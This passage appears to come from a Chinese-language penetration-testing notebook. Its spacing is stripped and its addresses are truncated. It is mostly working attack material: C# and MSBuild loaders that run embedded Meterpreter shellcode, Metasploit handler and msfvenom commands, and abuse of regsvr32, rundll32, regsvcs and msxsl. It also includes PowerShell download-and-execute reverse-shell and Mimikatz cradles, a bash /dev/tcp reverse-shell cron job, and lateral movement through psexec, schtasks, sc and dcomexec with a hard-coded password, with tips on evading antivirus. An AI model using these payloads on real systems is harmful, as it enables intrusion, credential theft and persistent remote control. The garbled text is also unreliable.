5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5};UInt32funcAddr=VirtualAlloc(0,(UInt32)shellcode.Length,MEM_COMMIT,PAGE_EXECUTE_READWRITE);Marshal.Copy(shellcode,0,(IntPtr)(funcAddr),shellcode.Length);IntPtrhThread=IntPtr.Zero;UInt32threadId=0;//preparedataIntPtrpinfo=IntPtr.Zero;//executenativecodehThread=CreateThread(0,0,funcAddr,pinfo,0,refthreadId);WaitForSingleObject(hThread,0xFFFFFFFF);return;}privatestaticUInt32MEM_COMMIT=0x1000;privatestaticUInt32PAGE_EXECUTE_READWRITE=0x40;[DllImport("kernel32")]privatestaticexternUInt32VirtualAlloc(UInt32lpStartAddr,UInt32size,UInt32flAllocationType,UInt32flProtect);[DllImport("kernel32")]privatestaticexternIntPtrCreateThread(UInt32lpThreadAttributes,UInt32dwStackSize,UInt32lpStartAddress,IntPtrparam,UInt32dwCreationFlags,refUInt32lpThreadId);[DllImport("kernel32")]privatestaticexternUInt32WaitForSingleObject(IntPtrhHandle,UInt32dwMilliseconds);}}3、msf設(shè)置useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST9setLHOST4444exploit-j4、微軟.NET框架包含了一個(gè)可以在cmd中運(yùn)行的VC#編譯器并且可以生成惡意的DLL文件，key.snk文件可以用來對(duì)生成的DLL作簽名。C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe/r:System.EnterpriseServices.dll/target:library/out:regsvcs.dll/keyfile:key.snkregsvcs.cs5、執(zhí)行C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exeregsvcs.dll獲得Meterpreter會(huì)話15.regsvr32環(huán)境：Kali:9Win7:5攻擊手法：工具地址：h://ihu./H3R1n/JSRaPy.it1、在kali上運(yùn)行JSRat.PYpythonJSRat.py-i9-p33332、受害機(jī)執(zhí)行命令regsvr32.exe/u/n/s/i:9:3333/file.sctscrobj.dll3.kali成功獲取受害機(jī)shellRundll32環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows2012R2（2）安裝Python2.7（或者將py文件打包成exe格式可以免殺）攻擊手法：rundll32AllTheThings.dll,EntryPointerse-tcp.xyz/payload.sct");window.close();";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell-nop-execbypass-cIEX(New-Opverse-IPAddress0-Port3333;"";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");";document.write();h=new%xt;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd/ctaskkill/f/imrundll32.exe",0,true);}";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");Scripting()vbs環(huán)境：攻擊機(jī)：Kali（0）被攻擊機(jī)：Windows2012R2（2）安裝Python2.7（或者將py文件打包成exe格式可以免殺）攻擊手法：vbs生成vbs代碼Bat生成bat批處理文件目標(biāo)主機(jī)執(zhí)行Empire成功獲取agent執(zhí)行系統(tǒng)命令jscriptSyncAppvPublishingServer環(huán)境：Kali:9Win10:00攻擊手法：msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=9LPORT=4444-fpsh-reflection>4444.ps12、SyncAppvPublishingServer.exe"n;((New-ObjectNet.WebClient).DownloadString('9/4444.ps1');4444.ps1|IEX"powershell-windowstylehidden-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('9/4444.ps1');4444.ps1"未復(fù)現(xiàn)成功TrustedDeveloperUtilities（）環(huán)境：Kali:9Win7:5MSBuild/3gstudent/msbuild-inline-task.git1、使用Msfvenom生成shellcode,替換入exec64.xml文件中。msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=9lport=4444-fcsharpuild/2003"><!--Thisinlinetaskexecutesx64shellcode.--><!--C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exeSimpleTasks.csproj--><!--SaveThisFileAndExecuteTheAboveCommand--><!--Author:CaseySmith,Twitter:@subTee--><!--License:BSD3-Clause--><TargetName="Hello"><ClassExample/></Target><UsingTaskTaskName="ClassExample"TaskFactory="CodeTaskFactory"d.Tasks.v4.0.dll"><Task><CodeType="Class"Language="cs"><![CDATA[usingSystem;usingSystem.Runtime.InteropServices;usingMicrosoft.Build.Framework;usingMicrosoft.Build.Utilities;publicclassClassExample:Task,ITask{privatestaticUInt32MEM_COMMIT=0x1000;privatestaticUInt32PAGE_EXECUTE_READWRITE=0x40;[DllImport("kernel32")]privatestaticexternUInt32VirtualAlloc(UInt32lpStartAddr,UInt32size,UInt32flAllocationType,UInt32flProtect);[DllImport("kernel32")]privatestaticexternIntPtrCreateThread(UInt32lpThreadAttributes,UInt32dwStackSize,UInt32lpStartAddress,IntPtrparam,UInt32dwCreationFlags,refUInt32lpThreadId);[DllImport("kernel32")]privatestaticexternUInt32WaitForSingleObject(IntPtrhHandle,UInt32dwMilliseconds);publicoverrideboolExecute(){byte[]shellcode=newbyte[510]{0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0x0a,0x64,0x13,0x13,0x41,0x54,0x49,0x89,0xe4,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5};UInt32funcAddr=VirtualAlloc(0,(UInt32)shellcode.Length,MEM_COMMIT,PAGE_EXECUTE_READWRITE);Marshal.Copy(shellcode,0,(IntPtr)(funcAddr),shellcode.Length);IntPtrhThread=IntPtr.Zero;UInt32threadId=0;IntPtrpinfo=IntPtr.Zero;hThread=CreateThread(0,0,funcAddr,pinfo,0,refthreadId);WaitForSingleObject(hThread,0xFFFFFFFF);returntrue;}}]]></Code></Task></UsingTask></Project>2、msf設(shè)置useexploit/multi/handlermsfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcpmsfexploit(multi/handler)>setlhost9msfexploit(multi/handler)>setlport4444msfexploit(multi/handler)>exploit3、通過MSBuild運(yùn)行才能獲得Meterpreter會(huì)話。C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeexec64.xmlWinwordKali9Win75，office2013攻擊手法：利用Officeword的/l參數(shù)來加載dlldllfile.dll使用kali制作dll本地執(zhí)行加載payload（未反彈shell，復(fù)現(xiàn)失敗）XSLScriptProcessing（XSL）環(huán)境：Kali:9Win7:5攻擊手法：1、在kali制作兩個(gè)文件，開啟Python3-mhttp.server80customers.xml<?xmlversion="1.0"?><?xml-stylesheettype="text/xsl"href="script.xsl"?><customers><customer><name>Microsoft</name></customer></customers>script.xsl<?xmlversion='1.0'?><xsl:stylesheetversion="1.0"xmlns:xsl="/1999/XSL/Transform"xmlns:msxsl="urn:schemas-microsoft-com:xslt"xmlns:user="/mynamespace"><msxsl:scriptlanguage="JScript"implements-prefix="user">functionxml(nodelist){varr=newActiveXObject("WScript.Shell").Run("cmd.exe/kcalc.exe");returnnodelist.nextNode().xml;}</msxsl:script><xsl:templatematch="/"><xsl:value-ofselect="user:xml(.)"/></xsl:template></xsl:stylesheet>遠(yuǎn)程下載并執(zhí)行msxsl.exe9/customers.xml9/script.xslXSLScriptProcessing（XSL）環(huán)境：Kali:9Win7:5攻擊手法：1、在kali制作兩個(gè)文件，開啟Python3-mhttp.server80customers.xml<?xmlversion="1.0"?><?xml-stylesheettype="text/xsl"href="script.xsl"?><customers><customer><name>Microsoft</name></customer></customers>script.xsl<?xmlversion='1.0'?><xsl:stylesheetversion="1.0"xmlns:xsl="/1999/XSL/Transform"xmlns:msxsl="urn:schemas-microsoft-com:xslt"xmlns:user="/mynamespace"><msxsl:scriptlanguage="JScript"implements-prefix="user">functionxml(nodelist){varr=newActiveXObject("WScript.Shell").Run("cmd.exe/kcalc.exe");returnnodelist.nextNode().xml;}</msxsl:script><xsl:templatematch="/"><xsl:value-ofselect="user:xml(.)"/></xsl:template></xsl:stylesheet>遠(yuǎn)程下載并執(zhí)行msxsl.exe9/customers.xml9/script.xsl環(huán)境：攻擊機(jī)A：Kali（0）用于接收反向shellCentOS（7）攻擊手法：通過ssh口令爆破或弱口令登錄后寫入反彈shell的計(jì)劃任務(wù)*/1****bash-i>&/dev/tcp/1/33330>&1查看例子crontab-e進(jìn)行編輯黑客通過在vps上nc-lvp3333獲取持久性shell流量分析：PsExec攻擊機(jī)：Windows2012R2（2）安裝Python2.7（或者將py文件打包成exe）Windows2012R2（1）攻擊手法：pythonpsexec.pyadministrator:3edc7UJM@1流量分析：環(huán)境：攻擊機(jī)A：Kali（0）用于接收反向shell連接攻擊機(jī)B：Windows2012R2（2）被攻擊機(jī)：Windows2012R2（1）安裝Python2.7（或者將py文件打包成exe格式可以免殺）攻擊手法：Schtasks-計(jì)劃任務(wù)1的IPC$共享，用uncnetuse\\1\c$"3edc7JUM"/user:Administrator查看共享Netview\\1目錄瀏覽dir\\1\c$\Users\Administrator\Desktop\復(fù)制本地1.bat到桌面copy1.bat\\1\c$\Users\Administrator\Desktop\查詢目標(biāo)時(shí)間nettime\\1添加計(jì)劃任務(wù)schtasks/create/s1/uadministrator/p3edc7UJM/ru"SYSTEM"/tnCMDNAME/scDAILY/st11:25/trC:\\Users\\Administrator\\Desktop\\1.bat/F1.batPowerShellIEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubuseoke-PowerShellTcp-Reverse-IPAddress0-Port3333成功獲取反向shell（測(cè)試過程種會(huì)有幾分鐘延遲）流量分析：at-計(jì)劃任務(wù)連接1的IPC$共享，用unc路徑netuse\\1\c$3edc7JUM/user:Administrator1.bat用at11501.bat360\\1at\\111:501.bat刪除共享連接netuse\\1\c$/delSc-計(jì)劃任務(wù)建立ipc連接后上傳等待運(yùn)行的bat腳本到目標(biāo)系統(tǒng)上，創(chuàng)建服務(wù)（開啟服務(wù)時(shí)會(huì)以system權(quán)限在遠(yuǎn)程系統(tǒng)上執(zhí)行bat腳本）sc\\1createtestbinpath="cmd.exe/cstartC:\\Users\\Administrator\\Desktop\\1.bat"開啟服務(wù)，運(yùn)行其它命令可以直接修改bat腳本內(nèi)容sc\\38starttest刪除服務(wù)sc\\38deletetestWindows2012R2（2）Windows2012R2（1）攻擊手法：打開命令行輸入mstsc輸入用戶憑證成功打開目標(biāo)遠(yuǎn)程桌面流量分析：DCOM利用Windows2012R2（2）Windows2012R2（1）445問題,工具本身是免殺的,自己實(shí)戰(zhàn)中一般專門用來橫向一些windows2012r2,別的系統(tǒng)系統(tǒng)可能會(huì)不好使,尤其根本特性所致dcomexec.pyadministrator:3edc7UJM@1"netuser"dcomexec.pyadministrator:3edc7UJM@1"PowerShellIEX(New-ObjectNet.WebClient).DownloadString('/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz-DumpPowershell環(huán)境：攻擊機(jī)：Kali（0）跳板機(jī)：Windows2012R2（1）被攻擊機(jī)：Windows2012R2（2）被攻擊機(jī)：Windows2008R2（3）PowershellRemoting是Powershell遠(yuǎn)程管理服務(wù)WinRM5985WindowsServer2012中是啟動(dòng)的，在WindowsServer2003/2008/2008R2中需要手動(dòng)啟動(dòng)。目標(biāo)主機(jī)開啟PowershellRemotingCmd執(zhí)行開啟PowershellRemotingPowerShell-exec-bypassEnable-PSRemoting–Force設(shè)置WinRM服務(wù)自啟動(dòng)Set-servicewinrm-startmodeautomatic驗(yàn)證狀態(tài)Get-WmiObject-Classwin32_service|Where-Object{$_.name-like"WinRM"}將所有遠(yuǎn)程主機(jī)設(shè)置為受信任Set-ItemWSMan:\localhost\Client\TrustedHosts-Force-Value*重啟服務(wù)Restart-serviceWinRM測(cè)試遠(yuǎn)程主機(jī)是否開啟遠(yuǎn)程管理功能Test-WsMan1查看受信任主機(jī)Get-ItemWSMan:\localhost\Client\TrustedHosts關(guān)閉UAC首先通過Word文檔DDE（Word文檔DDE-動(dòng)態(tài)數(shù)據(jù)交換